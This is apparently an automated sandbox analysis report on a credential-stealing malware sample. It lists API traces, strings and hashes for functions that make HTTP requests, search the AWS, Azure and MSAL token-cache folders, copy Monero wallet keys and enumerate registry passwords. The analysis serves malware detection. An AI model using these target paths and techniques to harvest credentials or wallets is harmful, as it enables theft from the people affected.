Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
Instruction ID: 278e2d59452c7798698de0d7337d4ee25a838119ba183b946a2491dc89487728
Opcode Fuzzy Hash: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
Instruction Fuzzy Hash: D981FC71910118ABDB28DB54CC95FEAB7B8FF18700F008299E10AE6250DF756B86CFA5

Function 008A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
HttpOpenRequestA.WININET(00000000,GET,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008A63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A646D
InternetCloseHandle.WININET(00000000), ref: 008A64EF
InternetCloseHandle.WININET(00000000), ref: 008A64F9
InternetCloseHandle.WININET(00000000), ref: 008A6503

Strings

ERROR, xrefs: 008A6407
ERROR, xrefs: 008A64C9
GET, xrefs: 008A637C

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: f1d284ff104bbdcadd3012522426cb9872bc6d600c734d4d81d4dcbb405184a7
Instruction ID: a4b8680b129c93f3650c1ea45a0076ab20f1f1ffdf414a0a928a6a57f8b1d929
Opcode Fuzzy Hash: f1d284ff104bbdcadd3012522426cb9872bc6d600c734d4d81d4dcbb405184a7
Instruction Fuzzy Hash: A5713071A00218ABEF24DBE4CC95FEE7774FB45700F108158F509AB694DBB46A85CF52

Function 008B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5857

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B532F
Part of subcall function 008B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B5383
Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5A0C
Sleep.KERNEL32(0000EA60), ref: 008B5A1B

Strings

ERROR, xrefs: 008B5636
ERROR, xrefs: 008B5849
ERROR, xrefs: 008B59FE
ERROR, xrefs: 008B577D
ERROR, xrefs: 008B5932
ERROR, xrefs: 008B5693

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
Instruction ID: 7147cdb2dd3bf1e165b5ea38c08904ec23eeb0854f25ed2092bef37a5877aa11
Opcode Fuzzy Hash: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
Instruction Fuzzy Hash: D8E11671910504AADB18FBA8DC96EED7778FF54300F508528B506E6691EF346B09CBA3

Function 008B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 008B4DCD

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943

lstrcat.KERNEL32(?,00000000), ref: 008B4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 008B4E59

Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92

lstrcat.KERNEL32(?,00000000), ref: 008B4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 008B4EE5

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49B0
Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C08D2), ref: 008B49C5
Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49E2
Part of subcall function 008B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008B4A1E
Part of subcall function 008B4910: lstrcat.KERNEL32(?,0127E9D0), ref: 008B4A4A
Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FF8), ref: 008B4A5C
Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A70
Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FFC), ref: 008B4A82
Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A96
Part of subcall function 008B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008B4AAC
Part of subcall function 008B4910: DeleteFileA.KERNEL32(?), ref: 008B4B31

Strings

\.IdentityService\, xrefs: 008B4ED9
msal.cache, xrefs: 008B4EF0
\.azure\, xrefs: 008B4DC1
\.aws\, xrefs: 008B4E4D
Azure\.azure, xrefs: 008B4DD3
Azure\.IdentityService, xrefs: 008B4EEB
*.*, xrefs: 008B4DD8
Azure\.aws, xrefs: 008B4E5F
*.*, xrefs: 008B4E64

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 30a658502127235313d6fbc419dd66d5506a7028c200a2c83366f61dd56822f1
Instruction ID: 890e87b5ba475e1966c5fb348b853f1a59a5e9afc254df62ed7f258fed499302
Opcode Fuzzy Hash: 30a658502127235313d6fbc419dd66d5506a7028c200a2c83366f61dd56822f1
Instruction Fuzzy Hash: 6E41867994021867DB54F760DC87FED7238FB25700F004458B585E62C2EEB4A7C98B93

Function 008A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
Part of subcall function 008A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
Part of subcall function 008A12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008A12D7
Part of subcall function 008A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
Part of subcall function 008A12A0: RegCloseKey.ADVAPI32(?), ref: 008A12FF

lstrcat.KERNEL32(?,00000000), ref: 008A134F
lstrlen.KERNEL32(?), ref: 008A135C
lstrcat.KERNEL32(?,.keys), ref: 008A1377

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,0127A8D8,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 008A1465

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

DeleteFileA.KERNEL32(00000000), ref: 008A14EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 008A1335
.keys, xrefs: 008A136B
\Monero\wallet.keys, xrefs: 008A138D
wallet_path, xrefs: 008A1330

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 5b8c6c18ccbb5e5ffbd467304f2d0d29e5e2908fd1c2a8739455b70ef8434eab
Instruction ID: 9334c7edb8eb50074ce3c576cdb94fa623aec5bfc1ae81b4b2825bbf7858e570
Opcode Fuzzy Hash: 5b8c6c18ccbb5e5ffbd467304f2d0d29e5e2908fd1c2a8739455b70ef8434eab
Instruction Fuzzy Hash: FB5143B1D501196BDB19EB64DCA5FED733CFB54700F4041A8B60AE2191EE306B89CBA7

Function 008A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 008A733A
Part of subcall function 008A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
Part of subcall function 008A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
Part of subcall function 008A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
Part of subcall function 008A72D0: HeapFree.KERNEL32(00000000), ref: 008A7459

lstrcat.KERNEL32(2F8AA020,008C17FC), ref: 008A7606
lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A7648
lstrcat.KERNEL32(2F8AA020, : ), ref: 008A765A
lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A768F
lstrcat.KERNEL32(2F8AA020,008C1804), ref: 008A76A0
lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A76D3
lstrcat.KERNEL32(2F8AA020,008C1808), ref: 008A76ED
task.LIBCPMTD ref: 008A76FB

Strings

: , xrefs: 008A764E

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
Instruction ID: 608ffe7e61b32617f9d195b4607afb47047f2cd0633716147b02a374aa5dbdf5
Opcode Fuzzy Hash: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
